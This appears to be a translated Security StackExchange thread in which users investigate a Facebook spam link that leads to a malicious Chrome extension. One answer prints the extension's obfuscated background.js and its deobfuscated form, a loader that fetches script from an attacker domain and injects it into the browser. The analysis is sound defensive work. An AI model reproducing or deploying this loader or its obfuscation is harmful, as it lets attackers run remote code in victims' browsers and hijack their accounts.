¿Qué tipo de “virus” de Facebook comparte el enlace a la lista de números hexadecimales?

1

Uno de mis contactos de Facebook logró infectar su navegador y / o comprometer sus datos de inicio de sesión. El resultado es que a intervalos regulares, presumiblemente impulsados por algún trabajo de CRON, las publicaciones de su cuenta se vinculan a una página en los perfiles de otros.

Esperaría algún virus en la página, pero es simplemente un documento HTML lleno de lo que parece basura.

<!DOCTYPE html>
<html>

  <head>
    <script type="text/javascript">
            var s e8e1f6a6c9f1e10 = "8a3fe80194";
            var s cc2b282b582ade9 = "7d92d7896e4";
            var s d594ccf3ab0112 = "44c8408f";
            var s 3bd9820d = "7d0b622f28";
            var s e66f0a78 = "f266438b79b";
            var s 6884d9 = "6e191fbdd";
            var s 5d217 = "95fb4c19fe";
            var s 20d4db5 = "a8d55";
            var s c610b0 = "5a62fad009";
            var s d080cdf38c11b56 = "8fba61927";
            var s b1d44d658a6878b = "fa4f4880";
            var s 80515b12c7c7 = "246b48dbae";
            var s 60331 = "d935db5e";
            var s 828d6f177edb = "9141eb4f0a998";
            var s 0f03c57762f594 = "f3e15a92596f";
            var s a51029e91 = "08f1fdaa4f";

    </script>
          <meta property="230a1b9" content="c2011df94c3bd" />
            <meta property="e4f49fa2ba4871e" content="f3ab66c" />
            <meta property="5edfdd7c012" content="03d34ebad190e6c" />
            <meta property="ee1aad1dfb45" content="3b4274f000a6251" />
            <meta property="faa54d3e79164" content="5d17b606b8deb" />
            <meta property="d8edd064d05" content="dc2d82e6e9380" />
            <meta property="7fae6238d5ad614" content="fb2b90b8d3743" />
            <meta property="370c635899882" content="a7489ab5519" />
            <meta property="8be30ad7e182" content="05acd34239b3599" />
            <meta property="f3dcae5" content="53e79f76" />
            <meta property="1c5585cc2" content="0efeeff5ff22" />
            <meta property="e2e47089" content="4bea8c444" />
              <title>
          17.908.529 views</title>
        <meta property="og:title" content="298947538" />
        <meta property="og:description" content="" />
  </head>

  <body>
    <h1>4200e002a7a458a9ac55cf9a</h1>
    <ul>
              <li>
          20438927b0f440696a697ed69        </li>
                <li>
          17ab800d6da89        </li>
                <li>
          83e18a3f99e714febab24        </li>
                <li>
          0902c76df58        </li>
                <li>
          ed84605356fe        </li>
                <li>
          d808b74516ed1ca27cd3        </li>
                <li>
          91bf81068985        </li>
                <li>
          91b0b712c95041690        </li>
                <li>
          7290c3ff31bae4b486b695e9d        </li>
                <li>
          b66acda355e35c        </li>
                <li>
          fcf316a3fef8        </li>
                <li>
          fa4bc9f5120723fc66        </li>
                <li>
          7ae04a845b42258a5        </li>
                <li>
          0a169abdbb        </li>
                <li>
          e2dd58513e4cba177513b4        </li>
                <li>
          34f675d984b130ef6e3cc60cb        </li>
                <li>
          615bf0d1a9        </li>
                  <ul>
            <div class="idadgrn hieesgo tiw">
              idadgrn hieesgo tiw            </div>
  </body>

</html>

Los encabezados también son normales:

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 993
Content-Encoding: gzip
Vary: Accept-Encoding
Date: Mon, 12 Sep 2016 21:50:25 GMT
Accept-Ranges: bytes
Server: LiteSpeed
access-control-allow-origin: *
Connection: close

El script en el HTML ni siquiera se ejecuta ya que no es un código javascript válido. Supongo que sin molestar a la víctima, no descubriré cómo logró comprometer su cuenta. Pero me pregunto, ¿cuál es el propósito de esos enlaces?

Aquí hay uno de ellos: http://cbf8kcux [DOT] fulldailyonlynews [DOT] com/COs10bR7 No siga la URL fuera del entorno seguro. Reemplacé los puntos con [DOT] para evitar que se pegara una copia del enlace sin pensar.

¿Cuál es el propósito de esto? ¿O es todo esto una especie de arenque rojo?

    
pregunta Tomáš Zato 12.09.2016 - 23:57
fuente

2 respuestas

5

André Borie estaba en el camino correcto. Esto parece ser una cuestión de comando y control de alguna descripción.

Mi novia tiene un enlace publicado en su página de FB y, como tenía su nombre, hizo clic en él. Esto la llevó a un sitio web con "código aleatorio", tal como lo expresó. Inmediatamente me contó sobre esto y me puse mis gafas de detective.

El enlace en cuestión era 0udfczyk [dot] videossite [dot] ga / LKbdc84n

Cuando intenté visitarlo en una máquina virtual en Chrome, me redirigió a una página de video de Facebook falsa (en fulldailyonlynews [dot] com ) con comentarios falsos y todo, y sin importar dónde hiciste clic, intenté agregar una extensión de navegador llamada " Zuve ", solicitando acceso a" Lea y cambie todos sus datos en los sitios web que visita ". Sí, no, gracias.

Enlace a extensión: https://chrome.google.com/webstore/detail/zuve/ofambggiemkoplmbdloidhlbicfcfmak

Sin embargo, cualquier visita posterior al enlace del sitio de videos no me redirigió al sitio falso de Facebook (¿Fakebook?). Simplemente me llevan al sitio de "código aleatorio" como lo describe el OP aquí y mi GF. Estos códigos (¿hashes?) Cambian con cada actualización de la página, y al limpiar todos los cachés y cookies, etc., se redireccionará a la página de Facebook falsa nuevamente (una vez).

NO he intentado instalar la extensión del navegador, pero teniendo en cuenta la evidencia, es bastante obvio que esto hará algo malicioso. Probablemente intentará (ab) usar tu cuenta de Facebook (u otras cuentas) para enviar enlaces más extraños a estas cosas.

Otros detalles:

  • El enlace no parece funcionar correctamente en Firefox u Opera (al menos en mi caso no lo hizo. No hay una página de Facebook falsa, solo aparece el "código")

Capturas de pantalla:

enlace

(tuve que vincularlo con una lista de directorios ya que todavía no puedo publicar más de 2 enlaces)

Espero que esto ayude a alguien ..

    
respondido por el Bambooz 13.09.2016 - 19:56
fuente
6

Descargué esta extensión (enlace en comentario de Bambooz ) e intenté verificar qué hará. Aquí está background.js (el script de fondo se ejecuta en el proceso de extensión ):

var lsym = true;
var cmal = 24059;
var mwwe = {
    "mayeceroh": 53574,
    "avagagozave": 83706,
    "zunucog": 40507,
    "agifarig": 20915,
    "koyuci": 89453
};
var zsyt = 45095;
var pnpgnw = this;
var dkrjfv = lwawh("3pYSKX4uo37VHpmhnNFbg",1,true);
var tcqrsh = lwawh("ryY7J8Z3g74UyR2kVm.lIf",10,false);
var rjowvk = lwawh("rCBFMe=kaJkzI24kVJidHRe09_",14,false);
var rsohfd = lwawh("1X7ly4Dg",3,false);
var tanxle = lwawh("E.5gmeigdC",6,false);
pnpgnw[rsohfd](dkrjfv+tcqrsh+rjowvk)[tanxle](function(lcqbpv) {
  var yvtdn = lwawh("3wfEI2",4,true);
  if(lcqbpv[yvtdn]){
    var hqnom = lwawh("dEkiMpwwiHI2j",9,false);
    lcqbpv[hqnom]()[tanxle](function(qevtny){
      var elprl = lwawh("vqGEgmpp",5,true);
      var ulmsq = lwawh("oXBqr?m9Szs1oV29dV5Yysi/2F",11,false);
      var mpytne = pnpgnw[elprl][ulmsq](qevtny);
      var mmtry = lwawh("jtwHM2llnDGrypi",7,false);
      var vcatxl = lwawh("1ELg1KZMnDuHc4eJ_yEHN4",9,true);
      var mkebn = lwawh("gtYlUuDVoEY",5,false);
      var ghvrw = pnpgnw[mmtry][vcatxl](mkebn);
      var otpjhs = lwawh("RuIrJi6gRmk",8,true);
      ghvrw[otpjhs] = mpytne;
      var tllma = lwawh("1u9=ye:",3,false);
      var bjltd = lwawh("UuuUoNZoRkZ7KreeaBP_ef",11,true);
      pnpgnw[mmtry][tllma][bjltd](ghvrw);
    });
  }
});
function lwawh(fdnzl,xijua,xgeswl){
  var yfhfby = "uTDHJMXrk?mNoICxU_37Y:zsAnhO=SEBdfv52p9/Gab1gLlF.jt60Z4e8cViyRKP";
  var qtlobq = ["Vt\/f.4IFjAM?nDmv7p:0OPrRh=ElbkTzacSZxUsX569ugL_CK1GB8JedYiNo32yH","X5Rdn?im41Y96:BAM8PIoUtulCpVS\/vb3k7cgExfjhH2_FJON.GZTLsyeDa0zKr=","Gl1m:NguS0Ex7JRFpyCHz_ZB6OPno\/UKfsM2jh84Ai5?9bIa3LYTcXd.tkveDr=V","iJMP?pCVUBr32:OA54TvtcgFaK=ysR9nzlo\/L8.k67xZdXEjNYS0efuHG1I_bmhD","H2FkGTno1O9AIux5\/dXSZagM7Nt8.bsvJ?rVpKY0=cjRCfePD3UB6:Ey_i4mlhLz","NHC_67h825t.TzGEmIj9cXou=pg0n:1OfLKSxrlDAeRybviaPY4BM\/UVFs3k?ZJd","mOyK5gjaz0T7R?kAL9S\/cUZG3V1Xrfxs:P_.hbN4Y2lo=uFCE8itdJMeBDv6IpHn","YFb2a1RVUnrm=Bjs\/HTIc4DhxegyC5JilfZ7GkPuzoLO:p8S0X9.t6EK_MN?3dvA"];
  var oqdaom = "";
  var imzfs = 0;
  while(qtlobq[imzfs]){
    imzfs++;
  }
  var xnykx = 0;
  while(fdnzl[xnykx]){
    var liscvq = 0;
    var xpxrc = -1;
    while(yfhfby[liscvq]){
      if(yfhfby[liscvq] == fdnzl[xnykx]){
        xpxrc = liscvq;
        break;
      }
      liscvq++;
    }
    if(xpxrc >= 0){
      var rfgqzf = 0;
      var eqvzdw = -1;
      while(qtlobq[xnykx%imzfs][rfgqzf]){
        if(qtlobq[xnykx%imzfs][rfgqzf] == fdnzl[xnykx]){
          eqvzdw = rfgqzf;
          break;
        }
      rfgqzf++;
      }
      oqdaom += yfhfby[eqvzdw];
    }else{
      oqdaom += fdnzl[xnykx];
    }
    xnykx++;
  }
  var ttfrv = "";
  for(uevije=xijua;uevije<oqdaom.length;uevije++){
    ttfrv += oqdaom[uevije];
  }
  oqdaom = ttfrv;
  return oqdaom;
}
var pkqu = [
    "enedige",
    "ucosus",
    81739,
    "usurujo",
    98363,
    "ejojata",
    79813
];
var qybb = {
    "ecohididiy": 85533,
    "ajofahacer": "suvazi",
    "upasibug": 89625,
    "pugofutec": 26653,
    "lusatehiy": "getulir",
    "obesomo": "fihayopuz"
};

Fue codificado / ofuscado. Así que me confundí para obtener el código fuente de origen:

window.fetch('http://idorunuso.xyz/kebapurefod/pulagube.bg').then(function(response) {
  if (response.ok) {
    response.blob().then(function(blob) {
      var code = window.URL.createObjectURL(blob);
      var js = window.document.createElement('script');
      js.src = code;
      window.document.head.appendChild(js);
    });
  }
});

Como todos vemos, este código ejecutará un código remoto. Desafortunadamente, ese enlace devuelve un código de error 404, por lo que no puedo continuar analizando. Pero por lo que hemos visto, esto es casi un código malicioso.

Por cierto, es como la muestra de malware que analicé en 2015 .

    
respondido por el Juno_okyo 14.09.2016 - 03:49
fuente

Lea otras preguntas en las etiquetas